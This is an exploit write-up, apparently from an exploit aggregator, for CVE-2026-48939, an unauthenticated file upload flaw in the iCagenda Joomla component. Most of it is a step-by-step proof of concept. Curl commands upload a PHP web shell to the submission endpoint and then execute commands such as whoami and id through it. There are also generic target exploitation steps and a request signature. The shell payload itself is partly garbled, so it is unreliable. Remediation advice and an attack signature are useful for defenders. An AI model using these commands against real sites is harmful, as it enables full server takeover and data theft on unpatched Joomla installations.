Exploit for CVE-2026-48939

## https://sploitus.com/exploit?id=A2DC23CB-0791-5A41-828F-25B34E8207C5
# CVE-2026-48939 - iCagenda Unauthenticated File Upload to RCE

## Overview

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-48939 |
| **CVSS 4.0 Score** | 10.0 Critical |
| **CVSS Vector** | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| **CWE** | CWE-284: Improper Access Control |
| **Affected Versions** | iCagenda 3.2.1 - 3.9.14 and 4.0.0 - 4.0.7 |
| **Fixed In** | iCagenda 4.0.8 and 3.9.15 |
| **Published** | 20 June 2026 |

## Vulnerability Description

iCagenda, a popular events and calendar component for Joomla, contains an unauthenticated file upload vulnerability that allows remote attackers to upload and execute arbitrary PHP code on Joomla 6 sites.

### Technical Details

The vulnerability exists in the frontend event submission form's file attachment feature:

1. **Missing Access Control**: The submit endpoint (`index.php?option=com_icagenda&task=registration.submit`) does not enforce authentication, bypassing the "Registered Only" access setting.

2. **No File Validation**: Uploaded files are saved with their original extension without:
   - Extension allowlist validation
   - MIME type verification
   - File content inspection

3. **Direct File Write**: Files are written to `/images/icagenda/frontend/attachments/[filename]` directly under the web root.

4. **PHP Execution**: On Joomla 6, the uploaded `.php` files are executable, leading to Remote Code Execution (RCE).

## Proof of Concept

### Method 1: Using curl (Single Command)

```bash
# Create PHP shell payload
cat > /tmp/shell.php &1");
}
?>
EOF

# Upload the shell
curl -k -s \
  -F "title=Test Event" \
  -F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
  "https://poloss-jomola.ddev.site/icagenda_submit.php"

# Execute commands via uploaded shell
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"
```

### Method 2: Using PoC Script

```bash
# Navigate to project directory

# Run PoC script
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site
```

## Exploitation Steps

1. **Identify vulnerable endpoint**:
   ```
   https://target.com/index.php?option=com_icagenda&task=submit
   ```

2. **Upload PHP web shell**:
   ```bash
   curl -X POST -F "jform[attachment]=@shell.php" \
     "https://target.com/index.php?option=com_icagenda&task=submit"
   ```

3. **Execute shell**:
   ```bash
   curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
   ```

## Impact

- **Confidentiality**: Complete loss of confidentiality - attacker can read all files
- **Integrity**: Complete loss of integrity - attacker can modify all data
- **Availability**: Complete loss of availability - attacker can deny service
- **Remote Code Execution**: Full server compromise

## Attack Signature

Based on real-world exploitation logs, the attack signature is:

```
# Step 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"

# Step 2: Execute
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0
```

## Remediation

1. **Immediate**: Update iCagenda to version 4.0.8 (or 3.9.15 for legacy branch)
2. **Alternative**: Remove or rename `com_icagenda` folders temporarily
3. **Note**: Unpublishing the component does NOT protect against this vulnerability

## References

- [iCagenda Zero Day RCE - mysites.guru](https://mysites.guru/blog/icagenda-zero-day-file-upload-rce/)
- [iCagenda Official](https://www.icagenda.com/)
- [Changelog 4.0.8](https://www.icagenda.com/docs/changelog/icagenda-4-0-8)
- [CISA ADP Advisory](https://www.cisa.gov/news-events/alerts)

## Disclaimer

This PoC is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.